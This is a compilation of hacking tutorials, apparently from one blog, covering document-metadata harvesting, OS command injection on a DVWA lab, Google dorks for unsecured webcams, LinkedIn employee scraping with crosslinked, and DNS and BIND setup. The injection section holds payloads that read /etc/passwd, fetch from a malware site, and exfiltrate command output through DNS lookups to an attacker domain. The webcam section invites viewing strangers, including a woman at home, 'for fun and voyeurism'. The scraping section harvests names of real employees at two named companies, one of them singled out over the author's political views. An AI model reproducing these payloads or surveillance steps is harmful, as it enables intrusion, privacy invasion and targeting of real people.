Welcome back, my aspiring cyber warriors!
Sometimes the best information is just there for the asking! Given a little knowledge and some simple tools and techniques, we can harvest information about individuals and organizations that they are not even aware they are providing us!
Organizations often post documents on their websites, usually in Word .doc(x), Excel .xls(x) or PDF format. These documents include significant amounts of metadata (data about data) that may include:
1. User Names
2. Email addresses
3. Printers
4. Software used to create it
If we can harvest this data, it can be critical to an effective social engineering attack, pentest or forensic investigation.
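As a rough illustration of how much metadata lives inside these documents, the Python sketch below pulls a few common Info-dictionary fields out of raw PDF bytes with a regular expression. This is a simplification for demonstration only (real tools like metagoofil and FOCA parse the full PDF object structure), and the sample bytes are fabricated.

```python
import re

def pdf_info_fields(pdf_bytes):
    """Extract simple /Key (value) pairs from a PDF Info dictionary.
    A rough illustration only -- metagoofil/FOCA do far more than this."""
    fields = {}
    for key, value in re.findall(rb'/(Author|Creator|Producer|Title)\s*\((.*?)\)', pdf_bytes):
        fields[key.decode()] = value.decode('latin-1')
    return fields

# Fabricated PDF fragment for demonstration
sample = b'<< /Title (Q3 Report) /Author (jsmith) /Producer (Microsoft Word) >>'
print(pdf_info_fields(sample))
# -> {'Title': 'Q3 Report', 'Author': 'jsmith', 'Producer': 'Microsoft Word'}
```

Notice how a single fabricated document already yields a likely username ("jsmith") and the software used to create it.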
Earlier, I showed you how to use the Windows-based tool FOCA to gather metadata. In this tutorial, we will use a Linux command-line (CLI) tool named metagoofil to do a similar task. It's always useful to have multiple tools for similar tasks, as the results may vary depending upon many variables.
Step #1: Download and Install metagoofil
Although metagoofil is no longer built into Kali, it is in Kali's repository, so you only need to install the package.
kali > apt-get install metagoofil
Step #2: metagoofil Help
After downloading and installing metagoofil, simply enter the command metagoofil in your terminal and metagoofil will display its help screen like below.
As you can see, metagoofil has only a few options, and the examples near the bottom of the screen display its usage. The key options are:
-d domain to search
-t the type of files to search for
-l limit of the number of files
-n number of files to download
-o output directory to download results to
-f format of the results
Step #3: Using metagoofil to Harvest Metadata at SANS.org
Let's try harvesting some metadata from sans.org, the cybersecurity training organization.
kali > metagoofil -d sans.org -t doc,pdf -l 20 -n 10 -o sans -f html
Where:
-d sans.org is the domain to harvest
-t doc,pdf are the types of files to harvest
-l 20 limits the results to 20 files
-n 10 limits the downloads to 10
-o sans outputs to the directory sans
-f html sends the results in HTML format
As metagoofil completes its harvesting of metadata, it begins displaying results in the terminal. As you can see below, it was able to recover 6 user names, a list of software used to create the documents, and 11 email addresses.
We can also view the results in a browser, since we defined the output type as html. Open your browser and navigate to the HTML results file in the output directory (sans, in our example).
As you can see below, metagoofil has created an easy-to-read HTML document with all the metadata it was able to harvest from documents on the sans.org website.
The information we were able to easily harvest from this site can be used to:
1. Design a social engineering attack against the email addresses;
2. Exploit the software we now know is on some systems;
3. Find individuals we have been searching for.
Conclusion
Some simple techniques and tools can effectively harvest open source intelligence from the vast repository of data on the Internet. metagoofil is an effective tool for extracting metadata from documents on an organization's website, provided the metadata has not been stripped out. This metadata can be used for multiple purposes, including pentesting, forensic investigation and social engineering.
Welcome back, my aspiring cyber warriors!
In this tutorial on Web App Hacking, we'll examine Operating System command injection. This web site vulnerability enables the attacker to inject and execute operating system commands into the underlying server and often fully compromise the server and all its data. If the attacker can inject OS commands on the server they can then compromise other elements of the network within the organization.
This usually happens when the application provides some functionality for the user that involves system commands. If the application does not properly sanitize inputs, the attacker may be able to send malicious commands to the operating system, even opening a shell or downloading malicious software.
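The difference between vulnerable and safe command construction can be sketched in a few lines of Python (the function names and the IPv4-only validator below are illustrative, not from any particular application):

```python
import re

def build_ping_vulnerable(user_input):
    # DANGEROUS: concatenating user input into a single shell string --
    # a ";" lets the attacker append a second command of their choosing
    return "ping -c 1 " + user_input

def build_ping_safe(user_input):
    # Validate the input, then pass it as an argument list so no shell
    # ever parses it and metacharacters like ";" lose their meaning
    if not re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", user_input):
        raise ValueError("not an IPv4 address")
    return ["ping", "-c", "1", user_input]

injected = "192.168.0.1; whoami"
print(build_ping_vulnerable(injected))
# -> ping -c 1 192.168.0.1; whoami   (a shell would run ping, THEN whoami)
```

The safe version would be handed to something like subprocess.run() as a list, which bypasses the shell entirely.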
Let's use the DVWA application on Metasploitable 2 to demonstrate this attack.
Step #1 Fire Up Kali
Step #2 Metasploitable with DVWA
Open your browser on Kali and navigate to the IP address of the Metasploitable system followed by /dvwa, such as http://192.168.0.157/dvwa. This will retrieve the login screen for DVWA. The credentials are admin/password.
Next, go to the "DVWA Security" tab on the lower left and click it. This opens the DVWA Security page. Set the security to "Low". Now, click on the "Command Execution" tab in the upper left of the screen. You should see a screen similar to that below.
Notice that this application allows you to send a ping. Go ahead and enter an IP address and click Submit and you should see the response in red below.
It's clear that this application is taking your IP address, concatenating it to the ping command, and sending out an ICMP echo request.
It may be possible to run more than one command from this window. In most operating systems, commands can be terminated with a semicolon. If we place a semicolon after the IP address, we may then add another command and get both to execute. Let's try the Linux command whoami.
192.168.0.1; whoami
As we can see above, the ping command executed and then whoami executed, revealing that the user is "www-data".
Since we are not root, we cannot retrieve the /etc/shadow file, but we may be able to retrieve the /etc/passwd file. We could add the command cat /etc/passwd after the IP address, and if it executes, we should be able to retrieve this file that contains all the usernames and accounts.
Success! Although we don't have their passwords, we do have all the accounts on the system.
Operators
We can concatenate commands this way with other operators as well as the semicolon. Here are a few:
; The semicolon is the most common metacharacter used to test an injection flaw. The shell runs all the commands in sequence, separated by the semicolons.
& It separates multiple commands on one command line. It runs the first command, then the second command.
&& It runs the command following && only if the preceding command is successful.
|| It runs the command following || only if the preceding command fails. It runs the first command, then runs the second command only if the first command did not complete successfully.
| The pipe redirects the standard output of the first command to the standard input of the second command.
The following command separators work only on Unix-based systems:
; (semicolon)
Newline (0x0a or \n)
For instance, we could use the double ampersand (&&) to run the ping command and then the netstat command. If the first command runs successfully, then the second command will run. If the first command fails, the second command will not execute.
192.168.0.1 && netstat
Blind OS Command Injection
It may be that the results of your command do not appear in the HTTP response and are not displayed in your browser. This is actually more common than not. We can still inject an OS command, just without seeing the results in our browser. This is referred to as blind OS command injection.
For instance, in our last OS command injection example, we ran netstat and the results were displayed in our browser. If the results are not displayed in the browser, we may be able to redirect the output to a file and then display that file. For instance, we might enter:
192.168.0.1 && netstat > netstat.txt
This would direct the output from the netstat command to a file named netstat.txt and save it in the current directory on the server. We might then be able to display its contents by directing our browser to that directory and file, such as:
192.168.0.157/dvwa/vulnerabilities/exec/netstat.txt
In addition, we may be able to use an out-of-band technique to determine that the command executed. For instance, we could finish the string of commands with an nslookup of a site and check whether the lookup was executed on the name server. This would verify that all the commands executed.
Finally, it may be possible to direct the server to a site containing malicious software:
192.168.0.1 && wget https://malwaresite.com
Executing arbitrary commands
Consider a shopping application that lets the user view whether an item is in stock in a particular store. This information is accessed via a URL like:
https://insecure-website.com/stockStatus?productID=381&storeID=29
To provide the stock information, the application must query various legacy systems. For historical reasons, the functionality is implemented by calling out to a shell command with the product and store IDs as arguments:
stockreport.pl 381 29
This command outputs the stock status for the specified item, which is returned to the user.
Since the application implements no defenses against OS command injection, an attacker can submit the following input to execute an arbitrary command:
& echo aiwefwlguh &
If this input is submitted in the productID parameter, then the command executed by the application is:
stockreport.pl & echo aiwefwlguh & 29
The echo command simply causes the supplied string to be echoed in the output, and is a useful way to test for some types of OS command injection. The & character is a shell command separator, and so what gets executed is actually three separate commands one after another. As a result, the output returned to the user is:
Error - productID was not provided
aiwefwlguh
29: command not found
The three lines of output demonstrate that:
1. The original stockreport.pl command was executed without its expected arguments, and so returned an error message.
2. The injected echo command was executed, and the supplied string was echoed in the output.
3. The original argument 29 was executed as a command, which caused an error.
Placing the additional command separator & after the injected command is generally useful because it separates the injected command from whatever follows the injection point. This reduces the likelihood that what follows will prevent the injected command from executing.
Useful commands
When you have identified an OS command injection vulnerability, it is generally useful to execute some initial commands to obtain information about the system that you have compromised. Below is a summary of some commands that are useful on Linux and Windows platforms:
Purpose of command | Linux | Windows
Name of current user | whoami | whoami
Operating system | uname -a | ver
Network configuration | ifconfig | ipconfig /all
Network connections | netstat -an | netstat -an
Running processes | ps -ef | tasklist
Blind OS command injection vulnerabilities
Many instances of OS command injection are blind vulnerabilities. This means that the application does not return the output from the command within its HTTP response. Blind vulnerabilities can still be exploited, but different techniques are required.
Consider a web site that lets users submit feedback about the site. The user enters their email address and feedback message. The server-side application then generates an email to a site administrator containing the feedback. To do this, it calls out to the mail program with the submitted details. For example:
mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com
The output from the mail command (if any) is not returned in the application's responses, and so using the echo payload would not be effective. In this situation, you can use a variety of other techniques to detect and exploit a vulnerability.
Detecting blind OS command injection using time delays
You can use an injected command that will trigger a time delay, allowing you to confirm that the command was executed based on the time that the application takes to respond. The ping command is an effective way to do this, as it lets you specify the number of ICMP packets to send, and therefore the time taken for the command to run:
& ping -c 10 127.0.0.1 &
This command will cause the application to ping its loopback network adapter for 10 seconds.
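The timing logic behind this detection can be sketched in Python. Here sleep 2 stands in for the delay the injected ping would introduce, since the point is only that a measurably slower response suggests the payload executed (the function and variable names are illustrative):

```python
import subprocess, time

def timed_request(argv):
    """Time a command -- stands in for timing an HTTP request that
    carries an injected time-delay payload like '& ping -c 10 127.0.0.1 &'."""
    start = time.monotonic()
    subprocess.run(argv, check=True)
    return time.monotonic() - start

# 'sleep 2' simulates the delay the injected ping would introduce;
# a response that suddenly takes seconds longer suggests the payload ran.
baseline = timed_request(["sleep", "0"])
delayed = timed_request(["sleep", "2"])
injection_likely = (delayed - baseline) > 1.5
print(injection_likely)
```

In practice you would send the same request with and without the payload and compare the response times.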
Exploiting blind OS command injection by redirecting output
You can redirect the output from the injected command into a file within the web root that you can then retrieve using your browser. For example, if the application serves static resources from the filesystem location /var/www/static, then you can submit the following input:
& whoami > /var/www/static/whoami.txt &
The > character sends the output from the whoami command to the specified file. You can then use your browser to fetch https://vulnerable-website.com/whoami.txt to retrieve the file, and view the output from the injected command.
Exploiting blind OS command injection using out-of-band (OAST) techniques
You can use an injected command that will trigger an out-of-band network interaction with a system that you control, using OAST techniques. For example:
& nslookup kgji2ohoyw.web-attacker.com &
This payload uses the nslookup command to cause a DNS lookup for the specified domain. The attacker can monitor for the specified lookup occurring, and thereby detect that the command was successfully injected.
The out-of-band channel also provides an easy way to exfiltrate the output from injected commands:
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
This will cause a DNS lookup to the attacker's domain containing the result of the whoami command:
wwwuser.kgji2ohoyw.web-attacker.com
Ways of injecting OS commands
A variety of shell metacharacters can be used to perform OS command injection attacks.
A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:
&
&&
|
||
The following command separators work only on Unix-based systems:
; (semicolon)
Newline (0x0a or \n)
On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:
` injected command `
$( injected command )
Note that the different shell metacharacters have subtly different behaviors that might affect whether they work in certain situations, and whether they allow in-band retrieval of command output or are useful only for blind exploitation.
Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.
Welcome back, my aspiring OSINT cyber warriors!
The Internet is the largest and deepest repository of data in the history of the world. With that tautology out of the way, let's get down to work, and maybe, a little fun.
All the data on the Internet can be very valuable to an investigator or hacker, but here we are going to have a little fun. Nearly every web cam is connected to the Internet and with just a little knowledge we can find and operate them.
In an earlier post here, I taught you a little about Google hacking. The table below details some of the most important keywords used in creating Google dorks, as they are known.
We can use these techniques to find unsecured web cams.
Although this is mostly fun, once while doing a pentest at a major university, I found their server room webcam unsecured. As a result, I could zoom in and see all their server and network hardware as well as observe the times the server room was unattended. This was invaluable information in developing a strategy for compromising their network!
Google Dorks for Web Cams
There are literally hundreds of different Google dorks for finding web cams, but these are some of the most effective and my favorites.
Let's try a few and see what we can find!
Hmmm...a restaurant patio somewhere on this planet with PTZ controls.
An intersection...you'll find plenty of these among the unsecured web cams.
The classic pendulum at Dusseldorf University in Germany.
It was night when I connected to this rooftop cam somewhere in Delft.
A pretty scene somewhere in Sweden, I believe.
Watching a family load and launch their boat near the Algonquin Hotel complete with PTZ controls. Be safe!
I wonder if this person knows that their every move is being watched by people all over the world?
A bar in Barcelona, Spain. It might be fun watching the drunks stumble out at closing.
A woman on your computer in her living room in Seattle.
Summary
Open Source Intelligence (OSINT) can be a valuable tool for the pentester or the forensic investigator, revealing a cornucopia of data on the target. It can also be used for fun and voyeurism by those so inclined.
Welcome back, my aspiring cyber warriors!
The Internet is the deepest and widest data repository in the history of the world! Those who can extract and cultivate intelligence from it, will be empowered like none other!
This data can be used for offensive security and forensic investigations, among many other applications.
Crosslinked is one more tool for automating the gathering of this data from that huge repository. Crosslinked is a Python script for extracting company employee names from LinkedIn. Of course, we could do this manually, but this tool will save us many tens of hours of tedious work.
Step #1: Fire Up Kali
The first step, of course, is to fire up our trusty Kali and open a terminal.
Step #2: Download and install crosslinked.py
Crosslinked is not built into Kali, nor is it in our Kali repository but we can find it on github.com. Simply clone it from m8r0wn's repository.
kali > git clone https://github.com/m8r0wn/crosslinked
Next, we need to download and install crosslinked's requirements. There should be a file named requirements.txt in our new crosslinked directory.
kali > cd crosslinked
kali > pip3 install -r requirements.txt
Step #3: Crosslinked Help
Before we begin working with crosslinked, let's look at its cursory help file.
kali > python3 crosslinked.py -h
In its simplest form, the crosslinked syntax looks like this:
crosslinked.py <name format> <company>
It's also important to note that you must give yourself permission to run the script.
kali > chmod 755 crosslinked.py
Step #4: Extracting Tesla Employees from LinkedIn
Now that we have everything set up with the crosslinked script, let's see whether we can find employees of Tesla, Elon Musk's electric car company. To do so, we need to specify the name format and the company name.
kali > ./crosslinked.py -f '{first}.{last}@tesla.com' tesla
Where:
crosslinked.py is the command
-f format option of the names
'{first}.{last}@company.com' the name format to use
tesla the company we are searching
When the script has completed its run, crosslinked should place a file in the default directory named names.txt. We can find it by simply doing a long listing.
To see the contents of this file, simply use the command more before the file name. As we can see above, crosslinked was able to extract the names of hundreds of people who work at Elon Musk's Tesla.
kali > more names.txt
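To illustrate what the '{first}.{last}' format string is doing, here is a small Python sketch that mimics the templating step: turning scraped "First Last" names into candidate addresses. This is an illustration of the idea, not crosslinked's actual code.

```python
def format_names(employees, fmt):
    """Turn scraped 'First Last' names into candidate addresses using a
    format string such as '{first}.{last}@tesla.com'.
    (Illustration only -- not crosslinked's actual implementation.)"""
    results = []
    for full_name in employees:
        parts = full_name.lower().split()
        if len(parts) < 2:
            continue  # skip names we can't split into first/last
        results.append(fmt.format(first=parts[0], last=parts[-1]))
    return results

scraped = ["Elon Musk", "Jane Q Doe"]
print(format_names(scraped, "{first}.{last}@tesla.com"))
# -> ['elon.musk@tesla.com', 'jane.doe@tesla.com']
```

This is why getting the name format right matters: the output is only useful if it matches the company's real address convention.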
Step #5: Extract the People Working at Breitbart News
Let's see if we can do the same task against another company. Let's find the employees of Breitbart News, the hate-mongering, conspiracy-promoting, racist and misogynist online magazine.
We already have the Tesla employees in the names.txt file, so unless we want to append the Breitbart employees to that file, we will need to direct crosslinked to create a new file. We can do that using the -o switch (see the help screen above).
kali > ./crosslinked.py -f '{first}.{last}@breitbart.com' breitbart -o breitbart.txt
Now, crosslinked goes out and extracts the Breitbart employee names from LinkedIn. When we do a long listing on our default directory, we find the file breitbart.txt that we directed crosslinked to create in the command above.
kali > ls -l
We can see the contents of that file by prefacing the file name with "more".
kali > more breitbart.txt
As you can see, crosslinked was capable of extracting from LinkedIn the names of hundreds of employees who work at Breitbart News. These are the people you can thank for defiling the public discourse with hate-filled, racist, xenophobic and misogynist misinformation.
Summary
The Internet harbors a vast wealth of information just waiting to be unearthed. Crosslinked helps us automate the process of extracting employee names for particular companies from LinkedIn, which may be crucial in a digital forensic investigation or penetration testing environment.
Welcome back, my aspiring cyber warriors!
The Domain Name System or DNS is one of those network protocols that makes the world go round. Without it, we would need to remember innumerable IP addresses just to navigate to our favorite web sites. Imagine trying to remember the IPv4 (32-bit) addresses of Facebook, Amazon and Hackers-Arise, just to visit each of those critically important web sites (only made worse by IPv6 128-bit addresses).
DNS was designed to translate a domain name--something people are rather good at remembering--into an IP address, the language of Internet routing. Think of DNS as simply a translation of domain names to their respective IP addresses. So, when you enter a domain such as www.hackers-arise.com into your browser, it is translated into a computer-friendly IP address (23.236.62.147) that the Internet can understand and route.
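We can watch this translation happen with a few lines of Python. This sketch uses only the standard library, and it resolves localhost, which is answered locally (from the hosts file) so it works even without a network connection:

```python
import socket

# gethostbyname() resolves a name the same way the OS does:
# hosts file first, then DNS. 'localhost' is resolved locally.
addr = socket.gethostbyname("localhost")
print(addr)
# -> 127.0.0.1 on a typical system
```

Swap in any public domain name and the same call walks the full DNS resolution process described below.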
In this tutorial on DNS, we examine:
I. How Domain Names work
II. How DNS works,
III. A Packet-level Analysis of DNS requests and responses,
IV. Vulnerabilities and security in DNS,
V. Build your own DNS server in Linux.
I. Domain Names
Domain names must be registered with ICANN (Internet Corporation for Assigned Names and Numbers), usually through an intermediary such as VeriSign or GoDaddy. Top Level Domains or TLDs include .com, .edu, .org and many others that we typically see at the end of a Fully Qualified Domain Name (FQDN).
DNS works in a hierarchical manner. The Top Level Domains or TLDs can have multiple subdomains under them. In the diagram above, both .redhat and .cnn are part of the Top Level Domain .com. A subdomain is a domain that is part of a larger domain. In this example, redhat and cnn are often just referred to as the domain in common parlance, but are actually Second Level Domains (SLDs) under .com.
Then, beneath these SLDs, or commonly referred-to domains, we may have many subdomains. For instance, within and beneath .redhat, we might have sales.redhat, engineering.redhat and development.redhat. This is a method of subdividing the domain. The leftmost portion is always the most specific, while the rightmost is the most general.
a. Fully Qualified Domain Name
A fully qualified domain name or FQDN is what many people refer to as an absolute domain name. A Fully Qualified Domain Name (FQDN) specifies its location from the absolute root of the DNS system.
Now that we have a basic understanding of domain names, the next issue in understanding DNS is how we translate domain names to IP addresses. Initially, clients used a simple hosts file on each client.
b. Hosts Files
When the Internet was very, very small (in a universe far, far away...), the association of domain names with IP addresses could fit into a single text file (ARPANET, the predecessor and prototype of the Internet, had just 4 sites). This single text file was, then and now, referred to as a hosts file. As the Internet grew larger, this hosts file proved inadequate. It was neither large enough nor could it be constantly updated as new domains were registered and old ones left or changed. Despite this, your system probably still has a hosts file.
On your Kali Linux system, your hosts file is located in the /etc directory as seen below. You can open it by entering;
kali> leafpad /etc/hosts
Note that each IP address is on the same line as the associated host, in this case localhost or Kali. Whenever you enter localhost in your browser, it translates it to your "home" IP or 127.0.0.1.
On the fourth line of my hosts file here, you will see an association of the private IP address 192.168.1.114 with the domain bankofamerica.com. With this hosts file in place, whenever I enter www.bankofamerica.com in my browser, I will be directed to the IP address 192.168.1.114, rather than the actual IP address of Bank of America at 171.159.228.150.
I can test this also by pinging bankofamerica.com.
As you can see above, when I then try to ping www.bankofamerica.com, my ping is directed to the address associated with bankofamerica in my hosts file. The hosts file takes precedence over DNS queries. This can be a key bit of information when attempting to do DNS spoofing on a LAN (see below).
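To make the hosts file format concrete, here is a small Python sketch that parses hosts-file syntax into a name-to-IP mapping. The bankofamerica.com entry mirrors the spoofed example above; the parser is an illustration of the file format, not how the OS resolver is actually implemented.

```python
def parse_hosts(text):
    """Parse hosts-file syntax (IP, whitespace, one or more names)
    into a name -> IP mapping, ignoring comments and blank lines."""
    mapping = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # strip comments
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            mapping[name.lower()] = ip
    return mapping

sample = """\
127.0.0.1   localhost
# spoofed entry, as in the example above
192.168.1.114   bankofamerica.com www.bankofamerica.com
"""
hosts = parse_hosts(sample)
print(hosts["www.bankofamerica.com"])
# -> 192.168.1.114
```

Because the resolver consults this mapping before ever sending a DNS query, one edited line is enough to redirect a whole domain on that machine.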
This is how DNS was operated when the Internet was very, very small.
II. How DNS Works
Now that the Internet contains billions of IP addresses and FQDN, the host file is woefully inadequate. Enter DNS. First developed by Paul Mockapetris (now in the Internet Hall of Fame) in 1983, DNS is both distributed and dynamic, unlike our hosts file.
DNS does not rely upon one file or one server, but instead upon many files across many servers around the globe. These servers are organized in a hierarchical manner. Due to this distributed nature, the DNS system is resistant to outages of one or many of these servers.
As we can see in the diagram above, the user asks (queries) the local DNS server to access download.beta.example.com. The local DNS server does not have that resource, as it is new. It then queries the root server. The root server responds "I don't know", but refers the local DNS server to the IP address of the authoritative server for the top-level domain (TLD), in this case .com. The local DNS server then queries the TLD server for .com, which responds with the authoritative server for the domain, in this case example.com. The local DNS server then queries the authoritative server for beta.example.com. If it has the record, it will return the resource (IP address); if not, it will respond that it doesn't know.
a. DNS Components
The DNS service has four (4) components:
1. DNS cache,
2. Resolvers,
3. Name servers,
4. Name space.
1. DNS Cache
This term is often confused, as it has at least two meanings. First, the DNS cache can be the list of names and IP addresses that you have already queried, which have been resolved and are cached for you so that no network traffic is generated to resolve them (making lookups much quicker). The second meaning refers to a DNS server that simply performs recursive queries and caching without actually being an authoritative server itself.
2. Resolvers
Resolvers are any hosts on the Internet that need to look up domain information, such as the computer you are using to read this website.
3. Name Servers
These are servers that contain the database of names and IP addresses and serve DNS requests for clients.
4. Name Space
Name space is the database of IP addresses and their associated names.
b. Zone Files and Records
Every DNS zone has a zone file. This zone file may be thought of as the DNS database.
These zone files contain one or more resource records. These DNS records must be periodically updated as new domains are added, others changed and old ones dropped. Without this process, the system would remain stagnant and eventually become completely out of date. Therefore, it is essential that DNS servers be capable of zone transfers.
1. Resource Records
A resource record is a single record that describes just one piece of information in the DNS database. These records are simple text lines such as:
Owner TTL Class Type RDATA
Each of these fields must be separated by at least one space.
2. Common Resource Record Types
SOA Records
The Start of Authority, or SOA, record is a mandatory record in all zone files. It must be the first real record in the file (although $ORIGIN or $TTL specifications may appear above it). It is also one of the most complex records to understand. Its fields include the primary name server, the email of the administrator, the zone's serial number and timers for refreshing the zone.
NS Records
NS or name server records identify the authoritative DNS servers for the zone.
A Records
The A (Address) record is used to map a domain or subdomain to an IPv4 address. For instance, hackers-arise.com points to 23.236.62.147.
AAAA records map a domain or subdomain to an IPv6 address.
CNAME (Canonical) records
The CName or canonical name maps one domain or subdomain to another domain name.
PTR records
PTR records are used in reverse DNS lookups (i.e., from IP address to hostname). A PTR or pointer record points to a canonical name, and just the name is returned in the query. You might think of these as the reverse of A or AAAA records.
MX Records
The MX record directs mail to a specific mail server responsible for accepting mail in the zone. Like the CNAME record, the MX record must always point to a domain and never to an IP address.
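To pull these record types together, a minimal zone file might look like the sketch below. The hostnames, addresses and serial number are illustrative only, not from any real zone:

```
$TTL 86400
example.com.   IN  SOA   ns1.example.com. admin.example.com. (
                   2024010101 ; serial
                   3600       ; refresh
                   900        ; retry
                   604800     ; expire
                   86400 )    ; minimum TTL
example.com.   IN  NS    ns1.example.com.
example.com.   IN  A     203.0.113.10
www            IN  CNAME example.com.
example.com.   IN  MX    10 mail.example.com.
mail           IN  A     203.0.113.20
```

Note that the SOA record comes first, the NS record names the authoritative server, and the MX record points to a domain (mail.example.com) that is in turn resolved by its own A record.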
III. Packet Level Analysis of DNS Queries
The DNS protocol, like other communication protocols our networks use, has a standard packet structure. It's fairly simple and you can view it below without going into great detail here.
If we capture DNS queries with Wireshark, we should see something like the capture below. Notice that a DNS query is sent from the client and the DNS response comes from the DNS server.
It's also important to note that these queries use UDP and not TCP (zone transfers use TCP).
If we expand the DNS packets, we can see that they come in two varieties, Standard Query as seen below...
...and a Standard Query Response as seen here.
IV. DNS Security and Vulnerabilities
The Domain Name System was once very fragile and vulnerable to attack. Over the years the system has been hardened and attacks are more infrequent, but they still occur. In some cases, attackers can simply harvest information from the target's DNS servers using DNS scanning and DNS recon (see Abusing DNS for Reconnaissance).
On a local area network (LAN), it may be possible to spoof DNS with tools such as dnsspoof to send client traffic to a local system of the hacker's choice. For instance, the attacker could send all the banking traffic to their malicious site and harvest credentials there.
A. DNS Vulnerabilities
Among the most malicious attacks on DNS would be changing your DNS records (such as an A record), thereby changing where your client is taken when requesting a website. These are increasingly rare, but not unheard of (see the Iranian DNS attacks below). Increasingly, successful attacks against DNS are Denial of Service (DoS) attacks.
While on most systems and protocols DoS attacks are an inconvenience, with a service as essential as DNS, a DoS attack can be crushing. Imagine if your business's or ISP's DNS server went down. Although the Internet would still be functioning (you could ping any IP address), you would not be able to connect to any sites without entering their full IP addresses (or changing your DNS server).
If we view the list of BIND (a Linux implementation of DNS) vulnerabilities in the CVE database, we can see the vast majority of the vulnerabilities in recent years are DoS attacks.
Among the most malicious DNS attacks would be tampering with zone data. A zone contains the data that maps IP addresses to domains. If an attacker can change that information on a DNS server, Internet traffic would be redirected to their website, causing all types of mischief.
B. Changing DNS Server Settings
Another type of attack against the DNS system would be to simply change the settings that direct DNS queries, pointing them to another, malicious DNS server. In a way, this isn't technically an attack against DNS itself, but rather an attack against internal credentials and servers, such as the mail server. You can read below the details of an attack U.S. CERT warned against in early 2019, where attackers obtained the credentials of the sysadmin (or another user with authority to change DNS records) and redirected users' DNS queries to their malicious DNS server.
Recently, a group of Iranian hackers were able to attack the DNS of multiple companies in order to harvest credentials. They did this in at least three different ways:
1. Attackers change the DNS records for the victim's mail server to redirect it to their own email server. Attackers also use Let's Encrypt certificates to support HTTPS traffic, and a load balancer to redirect victims back to the real email server after they've collected login credentials from victims on their shadow server.
2. The same as the first, but differing in where the company's legitimate DNS records are modified. In the first technique, attackers changed DNS A records via an account at a managed DNS provider; in this technique, attackers changed DNS NS records via a TLD (domain name) provider account.
3. Sometimes also deployed as part of the first two techniques. This relies on deploying an "attacker operations box" that responds to DNS requests for the hijacked DNS record. If the DNS request (for a company's mail server) comes from inside the company, the user is redirected to the malicious server operated by attackers, but if the request comes from outside the company, the request is directed to the real email server.
C. DNS Security or DNSSec
DNS by default is NOT secure. DNS can be easily spoofed due to the fact that DNS is based on UDP, which is not connection-oriented. DNSSEC or DNS Security Extensions was developed to strengthen the authentication in DNS by using digital signatures.
Every DNS zone has a public/private key pair. Any recursive resolver that looks up data in the zone also retrieves the zone's public key, which can be used to validate the authenticity of the data.
Before DNSSEC, it was possible for malicious actors to spoof responses and poison DNS data, making it unreliable. DNSSEC prevents this by:
1. Cryptographically verifying that the data it receives actually comes from the zone it believes it should come from;
2. Ensuring the integrity of the data so that it can't be altered en route, as the data must be digitally signed by the private key of the zone.
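Because plain DNS runs over UDP, a resolver accepts whichever answer arrives first with a matching 16-bit transaction ID — there is no signature to check. The illustrative Python sketch below (not part of any tool mentioned here) builds a minimal RFC 1035 query by hand to show just how little anti-spoofing protection is in the packet:

```python
import struct
import secrets

def build_dns_query(domain: str, recursion: bool = True) -> bytes:
    """Build a minimal DNS A-record query in RFC 1035 wire format.

    The 16-bit transaction ID is the ONLY anti-spoofing token in
    plain (non-DNSSEC) DNS -- there is no signature to verify.
    """
    txid = secrets.randbits(16)
    flags = 0x0100 if recursion else 0x0000   # RD (recursion desired) bit
    header = struct.pack(">HHHHHH", txid, flags, 1, 0, 0, 0)
    # QNAME: length-prefixed labels, terminated by a zero byte
    qname = b"".join(bytes([len(p)]) + p.encode()
                     for p in domain.split(".")) + b"\x00"
    question = qname + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return header + question

pkt = build_dns_query("hackers-arise.com")
```

Anyone who can see or guess that transaction ID can forge the reply; DNSSEC closes this gap by signing the zone data itself rather than trusting the transport.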
V. Implementing DNS (BIND) in Linux
Now that we understand the basics of how DNS works and how attackers might use DNS in their attacks, let's set up a DNS server on our Linux system. BIND, or Berkeley Internet Name Domain, is commonly used on Linux systems, is the most widely used DNS server on the Internet, and is among the best DNS implementations.
Although setting up and configuring a BIND server is a profession in itself, here we will set up a simple, basic BIND server on our local area network (LAN) to help you understand how these servers function.
1. First, let's download and install bind9 from the repository.
kali > apt-get install bind9
If bind9 is not in your repository, you can get it directly from ISC's repository using git clone.
kali > git clone https://gitlab.isc.org/isc-projects/bind9.git
2. Next, let's open the configuration file for BIND at /etc/bind/named.conf.options (all configuration files for BIND are located at /etc/bind).
kali > leafpad /etc/bind/named.conf.options
As you can see, we edited the highlighted paragraph to:
listen on port 53 on localhost and our local area network 192.168.1.0/24;
allow queries from localhost and 192.168.1.0/24;
use a forwarder at 75.75.75.75 (where DNS requests are forwarded when your DNS server can't resolve the query);
and enable recursion.
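Assembled, the edited options block might look something like the sketch below (the forwarder and network range follow the values above; adjust them to your own LAN):

```
options {
        directory "/var/cache/bind";

        // answer queries only from this host and the local LAN
        listen-on port 53 { localhost; 192.168.1.0/24; };
        allow-query     { localhost; 192.168.1.0/24; };

        // where to send queries this server cannot resolve itself
        forwarders { 75.75.75.75; };

        recursion yes;
};
```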
3. Next, let's open named.conf.local. This is where we define the zones files for our domain.
Note that we defined the locations of our forward and reverse lookup zone files. Now, we need to create these forward and reverse zone files.
Let's navigate to the /etc/bind directory. There you will see a file named db.local. This is a template for our forward lookup zone file. Let's copy it to a file named forward.hackers-arise.local.
kali > cp db.local forward.hackers-arise.local
kali > leafpad /etc/bind/forward.hackers-arise.local
Let's open this file in leafpad and make a few changes by specifying our domain (hackers-arise.com), the IP address of our DNS server (192.168.1.27), our mail server and finally the IP addresses of the web server and email server.
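A forward zone file built from the db.local template might look like the sketch below. The name server IP (192.168.1.27) comes from above; the web and mail server addresses (192.168.1.30 and 192.168.1.40) are placeholders for this example:

```
$TTL    604800
@       IN      SOA     primary.hackers-arise.local. root.hackers-arise.local. (
                              2         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                         604800 )       ; Negative Cache TTL
;
@       IN      NS      primary.hackers-arise.local.
@       IN      MX  10  mail.hackers-arise.local.
primary IN      A       192.168.1.27
www     IN      A       192.168.1.30
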